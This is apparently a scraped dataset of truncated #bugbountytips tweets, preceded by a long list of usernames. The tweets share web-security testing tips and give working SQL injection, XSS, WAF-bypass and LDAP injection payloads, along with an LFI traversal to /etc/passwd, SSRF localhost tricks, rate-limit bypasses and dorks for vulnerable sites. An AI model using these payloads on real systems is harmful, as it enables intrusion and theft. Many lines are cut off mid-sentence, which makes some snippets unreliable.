from_user
TheMuztahidul
TheMuztahidul
ret2basic
xumut00_
700_isnuoT
sentinelleFr
VinayKu80824352
x_Hoque
sentinelleFr
noobie_maniac
700_isnuoT
sentinelleFr
sentinelleFr
sectest9
sentinelleFr
vanshitmalhotra
sentinelleFr
riomulyadi_
t1nd19d
Darkness_E1
realkartiks
sentinelleFr
sentinelleFr
jodelak
sentinelleFr
sectest9
sentinelleFr
sentinelleFr
UneekVivek
nafisaqil832
sectest9
618Slava
bsidesahmedabad
UneekVivek
micha3lb3n
UneekVivek
UneekVivek
Aj_louni
Savan_77
Maulik1827
IncScripts
SSXman2
WebSecurityIT
assasinflyer
nafisaqil832
javisenberg
cybersec_feeds
Zero0x00
arp_29
Haroldperkin250
seckteck
tech_naivi
tech_naivi
Bhagavan_bolli
ChavdaZeel
sectest9
pr0gr35528
pr0gr35528
pr0gr35528
jattboe
cry__pto
cry__pto
x_Hoque
aubrey_lab
AaronCuddeback
x_Hoque
x_Hoque
aubrey_lab
hacback17
x_Hoque
x_Hoque
x_Hoque
laud3b
x_Hoque
x_Hoque
x_Hoque
sec_onee
x_Hoque
msabhishek97
sec_onee
frankmosigisi
cybersec_feeds
good_sector
good_sector
good_sector
CYBerSec_Freak
mohitkchandani
cybersec_feeds
cybersec_feeds
cybersec_feeds
dan_covic
sectest9
Nutritionist_AP
nodeQuotesBot
Kill__3r
cybersec_feeds
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
Nutritionist_AP
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
TechSG2
TechSG2
dynamicCISO
OttLegalRebels
th3hokag3
SSXman2
SatyamGothi
bountyhunter_fr
cybersec_feeds
cybersec_feeds
bountyhunter_fr
cybersec_feeds
techtrendingnow
rudr4_sarkar
bountyhunter_fr
bountyhunter_fr
HarryHSolo
cybersec_feeds
__ceraunophile_
__ceraunophile_
GeekScripts
bountyhunter_fr
bountyhunter_fr
plzmakelstb4shp
saadibabar
saadibabar
saadibabar
l_y_n_s
bountyhunter_fr
bountyhunter_fr
ReaLentLess79
bountyhunter_fr
wareeq_shile
mhsecure
wareeq_shile
saintmalik_
TheBugBot
cybersec_feeds
JMakopolo
fayis_vadakkan
itsdig
priyanshu_xo
iamkamaljeet418
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
roughwire
hackd00r
CharuDutt8
s3rgiomazari3go
tanmayn36
vanshitmalhotra
vanshitmalhotra
vanshitmalhotra
TheBugBot
PoundXI
bountyhunter_fr
streaak
bountyhunter_fr
KomodoGT
Jaffy___
WebSecurityIT
ssh0x00r
bountyhunter_fr
tanmayn36
bountyhunter_fr
F3RR4R1_R3D
abagdadi
Anticlue
Nutritionist_AP
D0rkerDevil
bountyhunter_fr
Faeeqjalali
jayeshmthakur
AldenAous
AldenAous
k1ss_n00b
hacback17
0sninja
harshbothra_
dynamicCISO
theloshackers
enoleriiand
bountyhunter_fr
AldenAous
cybersec_feeds
bountyhunter_fr
cyanpiny
laud3b
bountyhunter_fr
ja1sharma
CristiVlad25
JAX_MASTERS
AldenAous
sectest9
fluttbot
pwn0sec
Ranger_one_
TechSG2
TechSG2
theInfernobot
TechSG2
TechSG2
hsakarp_ilajna
hsakarp_ilajna
AldenAous
AldenAous
KalemaChris
firearmslawyer
0x61_
cybersec_feeds
theInfernobot
xxx_BUGGY_xxx
jsfairy
jsfairy
bountyhunter_fr
sectest9
JMakopolo
hsakarp_ilajna
bountyhunter_fr
KKTech7
chickflow0
WebSecurityIT
GainSec
iambeingjoker
vatsav990
bountyhunter_fr
iambeingjoker
iambeingjoker
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
WebSecurityIT
HarryHSolo
nodeQuotesBot
bountyhunter_fr
BeingjokerMeme
iambeingjoker
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
Nutritionist_AP
TechSG2
Nutritionist_AP
Nutritionist_AP
TechSG2
aye_robot
TechSG2
TechSG2
aye_robot
sectest9
TechSG2
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
TechSG2
aye_robot
aye_robot
nlognbot
aye_robot
aye_robot
saurabh_sam96
iambeingjoker
nodeQuotesBot
bountyhunter_fr
bountyhunter_fr
vNature0
haknfuk
bountyhunter_fr
sectest9
MrrFawadkhann
sectest9
bountyhunter_fr
safe_buffer
bbuerhaus
bountyhunter_fr
F3RR4R1_R3D
sectest9
CristiVlad25
JohnSno99347035
KKTech7
AldenAous
AldenAous
AldenAous
Nutritionist_AP
Alra3ees
bountyhunter_fr
bountyhunter_fr
Ayhemalfakhri
iambeingjoker
roughwire
bountyhunter_fr
iambeingjoker
bountyhunter_fr
gkhck_
SatyamGothi
bountyhunter_fr
gdattacker
dhakal_ananda
0xfsec
HertzCar
bountyhunter_fr
bountyhunter_fr
iambeingjoker
BeingjokerMeme
dan_covic
V3NOM_10
good_sector
sec_onee
bountyhunter_fr
ajdumanhug
salahelhossiny0
ajdintrejic
KomodoGT
AldenAous
Virdoex_hunter
vishnugadupudi
cry__pto
bountyhunter_fr
0xrudrapratap
k1ss_n00b
Nutritionist_AP
niravsikotaria
CYBerSec_Freak
bountyhunter_fr
TechSG2
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
Nutritionist_AP
bountyhunter_fr
Nutritionist_AP
skypatil98
pdnuclei
Monish91888822
bountyhunter_fr
mythicalcmd
streetofhacker
maverickNerd
bountyhunter_fr
_sickwiz
R4JVE3R
InonShkedy
MrrFawadkhann
amrul_01
AkaaZaan
bountyhunter_fr
ssh0x00r
ShieldVoC
BeingBharatiyaa
qw0lz
Nutritionist_AP
TechSG2
TechSG2
TechSG2
Debian_Hunter
PoundXI
bountyhunter_fr
could_10
vishne0
nodeQuotesBot
gmccane
s3rgiomazari3go
bountyhunter_fr
cyberdefender5
joeldeleep
bountyhunter_fr
Sudhans42246878
0xMiracle
makash
pdiscoveryio
bountyhunter_fr
INR_0x0Ma5K
ryan_kl_ko
sameh_9_
bountyhunter_fr
sh0mbo
Xiloe_Dev
saqibarif1998
knassar702
0x0Cj
sw33tLie
debangshu_kundu
rnd_infosec_guy
TebbaaX
bountyhunter_fr
hajiraess
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
_0nk4r_
AniruddhaKl
AndyInfoSec_
Jhaddix
Rajat_sharma111
_seecko
ExploitedSystem
tanmayn36
HackerOn2Wheels
neutrinoguy
joselbr5
sriramoffcl
hacktory1
roughwire
pxmme1337
Xer0Days
bountyhunter_fr
Digitalsanjog
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
SaitejaB171
SaitejaB171
chiraggupta8769
AldenAous
frankmosigisi
ssh0x00r
SecSummers
imnirfn
xploitprotocol
xploitprotocol
xploitprotocol
ssh0x00r
Tyr4ntSec
sillydadddy
OAcybersecurity
sectest9
fiddlycookie
AldenAous
muhamme16102088
muhamme16102088
muhamme16102088
mirac_dasmine
muhamme16102088
stokfredrik
Jhaddix
0xMiracle
AndyInfoSec_
sectest9
AniruddhaKl
caseyjohnellis
GainSec
TechSG2
TechSG2
nodeQuotesBot
TechSG2
TechSG2
TechSG2
TechSG2
TechSG2
EvMd15
r3dw0lf_sec
Michael1026H1
Akash0x01
sectest9
syauqqii
thedarkwayg
ArthusuxD
sectest9
striveben
sectest9
t1nd19d
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
mirhatx
pdiscoveryio
sectest9
Nutritionist_AP
Nutritionist_AP
TrainingBug
TrainingBug
daoud_youssef
bountyhunter_fr
RustySowers
Securityblog
plenumlab
bountyhunter_fr
CyberRitesh
bountyhunter_fr
text
RT @renniepak: Pretty happy with this one-liner to extract endpoints from JavaScript file
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips https://t.co/Z6Rv4hLnUC
RT @chiraggupta8769: shodan search org:"Target" http.favicon.hash:116323821 --fields
#bugbountytips
#bugbountytip By @K4r1it0 https://t.co/HLVXbYWfey
RT @pwntheweb: This is how I found sql-Injection 100% of the time
For https://t.co/GIZTA591Y0
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
#bugbounty #BugBountyTips
RT @0xElkot: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters
#bugbountytips #BugBounty #reconnaissance https://t.co/IKr8ehNg24
RT @Naategh_: The number of zeros in http://127.0.0.1 doesn't matter, so we can use t
http://127.1
http://127.000000000000000.001
http://127.000.000.00000000000000001
...
#bugbounty #bugbountytips
RT @CharuDutt8: I just published How I was Able To bypass Cloudflare WAF https://t.co
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
RT @AldenAous: Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty https://t.co/2JI8LraxWV https://t.co/uL0
RT @musiclouderlml: my first #bugbountytips ,
the company's mail system can be vulnerable to homographs IDN ,
try to ask reset password for victim@example-com to victim@exàmple-com , if the backe
RT @trbughunters: Top 25 XSS Dorks according to OpenBugBounty
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht
RT @chiraggupta8769: Ways to bypass rate limit. By @fuxksniper
#ethicalhacking #bugbounty #bugbountytips #bugbountytip https://t.co/robIZvKiiZ
RT @AldenAous: ⛓
Get Reflected XSS within 3 minutes ⛓
by: @gkhck_
https://t.co/ZSGoyAvqdo
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @cry__pto: Metasploit Community CTF 2020 Writeup.pdf:
https://t.co/EJ6Ox1fGYc
#Pentesting #Hacking #redteam #bugbountytips
RT @Bugcrowd: Want to make bug hunting your career, but hitting some blocks and uns
Take some tips and tricks from @ninad_mathpati in today's researcher spotlight! #ItTake
RT @TobiunddasMoe: My quick and basic recon routine for finding Subdomains while doi
#hackers #netsec #bugbountytip #bugbountytips #bugbounty #infosec #redteam #pen
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/8w7MH3XHrJ
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/8w7MH3XHrJ
RT @gkhck_: To be more successful in bug bounty ...[I think] A short but very effective s
*Take a break, Learn more and Try again
https://t.co/pgFf3xWxZH
#bugbountytips #bugbountytip #infosec
RT @chiraggupta8769: Accessing the Admin Panel tip. By @SalahHasoneh1
#bugbounty #bugbountytips #bugbountytip https://t.co/bgv4Dw7dOu
RT @pdnuclei: Done with subdomain enumeration? here is how you can get more assets
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips https://t.
RT @mariusshoratau: Have you heard about AlienVault OTX? You can use it to get easy b
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht
RT @jodelak: Github dorks for finding secret data..
#bugbountytips #Security #Network #infographics
#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @r0bre: Proud to release ScriptFinder, a tool for automated JS file discovery!
https://t.co/cTpu4tBoh4
Thx to @TomNomNom @stokfredrik @hakluke @NahamSec @nnwakelam @zseano @EdO
#recon #hacking #infosec #bugbounty #bugbountytip #bugbountytips https://t.co/0A9
RT @avasdream_: So here is my repository of dockerized pentesting tools. This comes in
https://t.co/2ywul31IVH
#Pentesting #Docker #Dockerfile #Containers #BugBounty #BugBountyTip #bugbounty
Github dorks for finding secret data..
#bugbountytips #Security #Network #infographics
#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @emgeekboy: For all the hackers starting with bug bounty, here is how you can get r
#bugbountytips #recon #security
RT @_Rutik_Sangle_: #100daystolearnandimprove
Day 95:
1. Continued Solving some more Authentication labs on @WebSecAcademy
2. Read some Authentication Bypass blogs:
https://t.co/PQOGxWzXJW
https://t.co/wcYOh8fO5N
https://t.co/ipor9FYcR5
https://t.co/iEAAzGnsJp
#infosec #bugbounty #bugbountytips
RT @Virdoex_hunter: web pentesting roadmap
https://t.co/gMuHryDZnt @ADITYASHENDE17 @stokfredrik @NahamSec @nehatarick @m
RT @TheHackersNews: << Interesting Case Study >>
How Bug Bounty Platforms—HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter—R
https://t.co/pWXnVycfNp
#infosec #pentest #bugbountytips #privacy #bugbountytip #cybersecurity #informatio
RT @gkhck_: #bugbountytips #infosec #bugbountytip
1 - Go Burp Suite / Target
2 - Select all items
3 - "Save selected items" (targets)
4 - https://t.co/2p02LqodqY -i targets -b -r ^/ -o cli https://t.co/gkzXmwJV4i
RT @knassar702: #PmG - Extract parameters/paths from urls
https://t.co/0Oah7JwH76
#bugbountytips #recon https://t.co/09hZn9fwvq
RT @618Slava: I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips https://t.co/xKJAuhjM8h
I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips https://t.co/xKJAuhjM8h
RT @Aj_louni: Just a quick reminder the AMA by @bsidesahmedabad with the humble lov
#bugbounty
#bugbountytips
#stream https://t.co/p30ZP4gOnW
RT @laud3b: Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this
.
https://t.co/C2E8XUKGRz
#bugbountytips #bugbounty https://t.co/OEkYLIt3YE
Broken link hijacking!
#bugbounty #bugbountytips https://t.co/Py2g24HxbZ
RT @SalahHasoneh1: Dorks for CVE-2020-3452
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @m4ll0k2: When you find a public form (contact form,etc.) try these payloads (blind
Just a quick reminder the AMA by @bsidesahmedabad with the humble lovely @thedawg
#bugbounty
#bugbountytips
#stream https://t.co/p30ZP4gOnW
RT @cry__pto: DOM XSS in Gmail with a little help from Chrome.pdf:
https://t.co/ADkttdw0r7
#bugbountytips #Pentesting #Hacking #redteam
RT @Zero0x00: Join us tonight at 9 pm for an intriguing live session with @thedawgyg
https://t.co/4aT4ldTgn6
Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
It's going to be great fun!!!!
Do join us :)
#bugbountytips #hacking https://t.co/bMrUvr0kFk
RT @fayis_vadakkan: How to Bypass The Rate limiting✌️✌️
Add this header in to the post request with an IP address.
X-Forwarded-For: (Any IP Address )
#bugbountytips #bugbounty #vulnerability #Hackers #exploit
RT @AldenAous: Top 25 Local File Inclusion (LFI) Parameters 🛡️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @SalahHasoneh1: Using the password reset code more than once
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @laud3b: CloudFlare Origin Certificate
How to find out the real server IP hidden behind the Cloudflare CDN
443.https.tls.certificate.parsed.subject.common_name: CloudFlare Origin Certificate
#bugbountytips #bugbounty
RT @manas_hunter: Github dorks for finding secret data..
Happy hacking:)
#bugbountytips #infosec https://t.co/GOk9SvUQMt
RT @s3rgiomazari3go: Sublist3r is a tool designed to enumerate subdomains of website
https://t.co/20u5jZOPaR
#cybersecurity #hackingtools #bugbountytips https://t.co/3TLqEVmFaV
RT @SalahHasoneh1: Ways to bypass rate limit
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
Join us tonight at 9 pm for an intriguing live session with @thedawgyg on @bsidesahm
https://t.co/4aT4ldTgn6
Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
It's going to be great fun!!!!
Do join us :)
#bugbountytips #hacking https://t.co/bMrUvr0kFk
RT @harshbothra_: It was great to have a talk with @dynamicCISO. In case if you misse
Slides: https://t.co/d77RbZXwqG
Stream: https://t.co/vrILyaZoLj
Thanks, @hacback17 for carrying this out.
#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd
RT @laud3b: You can change WPEngine's config file on the WordPress blogs. Path "/_wp
#bugbountytips #bugbounty https://t.co/mwRqcvFj5p
RT @Jhaddix: Monday Night #BugBounty #bugbountytips
- Found 2 sites with source code disclosure via git.
- Struggled with git for a long while to extract files from objects.
- Audited some PHP
- Frustrated with git, going to bed =P
RT @bbuerhaus: Once I realized the trick to @adamtlangley's "I once was blind but now
TIL @PortSwigger's Burp Collab does SMTP!
This is insaaanely useful.
#bugbounty #bugbountytips https://t.co/1Xdo79FEUG
RT @AldenAous: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/Rf4Vfwmfp2 https://t.co/Lu
RT @SalahHasoneh1: Accessing the Admin Panel tip
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @terjanq: I created a repository to keep track of cool XSS payloads https://t.co/EcV
Check this out!
#xss @XssPayloads #bugbountytips https://t.co/jH9tUS3GgW
RT @dhakal_ananda: Wanna know the best way to be demotivated in the bug bounty fie
Compare yourself with others!
#bugbounty #bugbountytips
RT @chiraggupta8769: Github Dorks For Finding Information Using Extension By @D0rke
#bugbounty #bugbountytip #bugbountytips https://t.co/WmTKTXqAR5
RT @chiraggupta8769: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&
Handy as hell tip for checking which functions you need to bypass on PHP RCE.
Tip By @Random_Robbie
#bugbountytips #bugbountytip #bugbounty
RT @chiraggupta8769: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/CAemcyCGQn
RT @intigriti: Did you know you can get the source code of Electron apps by using this h
Metasploit Community CTF 2020 Writeup.pdf:
https://t.co/EJ6Ox1fGYc
#Pentesting #Hacking #redteam #bugbountytips
DOM XSS in Gmail with a little help from Chrome.pdf:
https://t.co/ADkttdw0r7
#bugbountytips #Pentesting #Hacking #redteam
RT @XSaadAhmedX: BugBountyTip: If you are playing with `API ENDPOINT` always try to s
#bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH
RT @rapiddns: shodan dork
title:"SSL VPN Service"
"webvpnlogin=1"
Happy Hacking!
#bugbountytip #bugbountytips #bugbounty #cisco #vulnerability https://t.co/3As6Gw
RT @hacback17: Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Fre
https://t.co/QVFHjzbBPj
Coupon Code: COPSHOTMEINPORTLAND
#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm
RT @xalerafera: #bugbountytips #hackerone #bugbounty #recon
Find api links in subdomains, or how to find a simple SSRF in five minutes in a big compa
assetfinder --subs-only https://t.co/oBxOXg0ke5 | waybackurls | grep "?url="
Happy hacking https://t.co/6jFrG3l0Oy
RT @11xuxx: Horizontal priv escalation & full account takeover
1. registered a new user for my company at "/api/register/48e33445-f797-4e62-801f-e
2. changed the UUID to a numerical value -> "2"
3. user created under another company
4. full account takeover
#bugbountytips https://t.co/SsZd1UgEGP
RT @amanmahendra_: Shodan dork for CVE-2020-3452
“Set-Cookie: webvpn;”
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #togetherwehithar
Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Free for today with
https://t.co/QVFHjzbBPj
Coupon Code: COPSHOTMEINPORTLAND
#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm
RT @MrCyberwarrior: Privilege Escalation
#bugbounty #BugBountyTips https://t.co/oqfqA8GVDX
RT @11xuxx: Wildcard bypass & LFI
1. Intercepted a POST req that pointed to a local file "/usr/local/redacted/filename"
2. tried "/etc/passwd" -> bad request
3. "/user/local/../../etc/passwd" -> bad request
4. "/user/local/redacted/../../../etc/passwd" -> OK
5. LFI & bounty
#BugBountyTips https://t.co/yNcqbr736R
RT @iambharat18: #BugBountyTips #bugbounty #SharingIsCaring Bug: 2FA Bypass->
-- Sometimes "0000" can give the correct OTP response for every account and redirect y
You can change WPEngine's config file on the WordPress blogs. Path "/_wpeprivate/con
#bugbountytips #bugbounty https://t.co/mwRqcvFj5p
RT @poison_h1: This tip may be posted by someone before. However, I encountered this
#BugBountyTip #BugBountyTips #infosec https://t.co/utvdR0OqMU
RT @avanish46: After 2 days of struggling, Bypassed a strong XSS filter on one of the pr
[ No '>' was allowed , no Html tags, Character length 35 ]
XSS Payload used :-
<svg onload="alert(1)" <="" svg=""
@XssPayloads
#BugBountyTips #BugBounty https://t.co/T2bZQi9u10
RT @_heinthant: Got a survey from?
Don't only test for blind xss
Try this once
#bugbountytips https://t.co/w2jr5FMLec
RT @Virdoex_hunter: SSRF one-liner command (both manual & automatic) and tip
More SSRF tips:
https://t.co/8GSH3POwb3 #bugbountytip #bugbountytips
@ADITYASHENDE17 @1ndianl33t @stokfredrik @dhakal_ananda @remonsec @trippy_bh
RT @alicanact60: Don't forget to check the responses. Maybe you can find some tokens l
I found a token in response and went to mailbox. The email verification link was xx+.com
And I saw they are same tokens!
#BugBountyTips #BugBountyTip https://t.co/Yncxc406hp
RT @SatyamGothi: NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!
https://t.co/qKr1pPXn2t
Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️
Hope it helps :)
#bugbountytips #bugbounty
RT @stokfredrik: HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loo
August is going to be.. crazy!
feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec https://t.co/PAbmt6Zms6
I was testing for SSTI on this page using this payload {{9-3}} and this is the output I am get
#bugbountytips
#bugbounty https://t.co/NCC8CJWYTF
RT @PoundXI: Two good articles about HTTP Request Smuggling.
1.https://t.co/trsGgcBCOg
2.https://t.co/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @Queseguridad: When auditing a SAP it is important to have a good dictionary, as it
RT @HusseiN98D: SSRF script requested by @Alra3ees
This script will take a domain and a callback server, append SSRF parameters and fire th
#BugBountytip #BugBountytips #BugBounty https://t.co/TOLtwDq8u1
RT @m4ll0k2: I found a lot of SSRF issues via inject headers (like x-forwarded-host,..etc) w
https://t.co/YRJj4XR3av
By @hakluke
Will be helpful for new bug bounty hunters. Watch it out.
#bugbounty #bugbountytips #cybersecurity
RT @maverickNerd: I just published Android App Security & Testing https://t.co/cQ
It was long pending, found a draft in my notes, corrected it and thought why not share i
#androidsecurity #bugbountytips #bugbounty
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/ALXAVUiIf7
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/ZVrslIQtoM
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/othzLzOqx1
RT @lutfumertceylan: 🚀 How can you make a Javascript Polyglot for XSS? 🚀
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @harshbothra_: XSS is pure love and combined with luck, it may give unexpected res
#bugbountytips #bugbounty #hacking #bugbountywriteups #security
RT @HackerHumble: OTP Verification bypass #5
1. Web app is sending a verification code to email before changing some sensitive fields
2. Intercepted the request in burp and found the email parameter (eg: email: victim@gm
#bugbountytips #bugbounty #hacking
RT @Kill__3r: Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty https://t.co/24zT3EBtmr
Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty https://t.co/24zT3EBtmr
RT @CristiVlad25: What I consider the top two learning and testing books for #pentestin
#cybersecurity #bugbountytips #penetrationtesting
https://t.co/d9bPjpqcxH
RT @ShMalav: #bugbountytips
#bugbountytip
Subdomain Enumeration tip
Install https://t.co/v8eYrU0PhC
run this tool and get resolvers.txt as a result .
Now
Run subfinder from project discovery and use that file
subfinder -d domain_com -o result.txt -nW -v -rL resolvers.txt
😉 😉😉😉
RT @thedarkwayg: Yesterday I sent 5 submissions to @Bugcrowd .
Results: 2 Triaged, 3 Dups 😂😅.
WAF Bypass payload:
">'><details/open/ontoggle=confirm('XSS')>
#BugBountyTips #BugBounty https://t.co/qrSB4gyBKc
RT @_Y000_: #Dork to find pages vulnerable to #xss
This one targets a #vulnerability in a #wordpress theme called Fruitful
intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext
#CyberSecurity #hacked #bugbountytips https://t.co/xrbVbGGrX4
RT @_Y000_: This one is for finding vulnerable iCloud devices; we can see all
intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camer
*Note: you can modify the parameters for other results
#Cybersecurite #dork #bugbountytips https://t.co/7NPS5mjfWw
RT @shreyasrx: LDAP Injection 💥
1/3
Payloads :
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
#bugbountytips
#shieldindia
RT @rohit_sonii: Escalating Self XSS to Account Takeover by chaining multiple low level
https://t.co/KtSw3vi80q
#bugbountytips #bugbountytip #bugbounty #infosec #togetherwehitharder
RT @manas_hunter: #bugbountytips
#bugbounty
#infosec https://t.co/II4aQLxH0T
RT @GochaOqradze: #bugbountytip #bugbountytips
Today I bypassed the F5 BIG-IP WAF with an XSS payload.
Interestingly, %5K is converted to the "P" character.
In response source I got
"><P/onweel=alert(1)>mouse wheel here<!--
Payload:
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
RT @y0dhha: XSS Cheat Sheet
#xss #bugbounty #exploit #BugBountyTips #BugBountyTip https://t.co/zhc1VdddOO
RT @zedsec009: Cloudflare bypass & template injection to XSS in one shoot !
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#bugbountytips
RT @0xVeera: Private Profile Disclosure - going beyond /wp-json/
The site was using Wordpress
I found various bypass techniques to access private user information.
#bugbountytips @Bugcrowd @SynackRedTeam
Thanks to @ADITYASHENDE17 @u1tran00b @upen1994 https://t.co/Wl5uQJiQ6P
RT @hacback17: It was a fantastic session loaded with lots of live examples. Thank you
Video: https://t.co/hu5Qw0J18i
Slides: https://t.co/pOIyo27sbC
#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #
RT @th3hokag3: Bug Bounty Tip:
#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity https://t.co/1FU0
Bug Bounty Tip:
#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity https://t.co/1FU0
RT @trbughunters: Find Passwords, Exposed Log Files with Google Dorks
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!
https://t.co/qKr1pPXn2t
Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️
Hope it helps :)
#bugbountytips #bugbounty
RT @intigriti: How can you leverage out of scope domains without breaking a program's
@healthyoutlet enumerates OOS subdomains & creates a wordlist to use for in-scop
RT @AldenAous: 🚀💡 XSS from another level 💡🚀
https://t.co/YFIsP4lt9K
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec
RT @hackd00r: Subscribe to our Telegram Channel for Hackdoor Cyber Security Events a
🤖🤖🔥🔥👾👾👇👇👇
https://t.co/sqSFXdEOmM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
RT @securestep9: Stuck at home due to Coronavirus? It is a great time to learn about fin
Here's a great collection of write-ups collected by @PentesterLand from 2012 to 2020:
#BugBountyTips
#BugBountyWriteups
https://t.co/PKKHWJig9D https://t.co/QDo79j0nTP
RT @hsakarp_ilajna: comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains
#bugbountytips #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
RT @KomodoGT: https://t.co/IqiCVzbCkd MR r0b0t.clip >>> #blockchain #open
RT @D0rkerDevil: #bugbountytips
webarchive > found email change unconfirmed link > checked source > found e
at this point I cannot change the mail of the user as it won't be good for the user
reported
#bugbounty #security
RT @farah_hawa01: NEW VIDEO: In this video, I explain how JWTs work and how to att
https://t.co/RR4Dmclkyw
RT @micha3lb3n: Just gimme a list of urls or a url, I can do the following :
1. Extract all the hidden endpoints from the source.
2. Filter out live domains
3. Brute force endpoints with a word list.
And all these really fast
says SourceWolf.
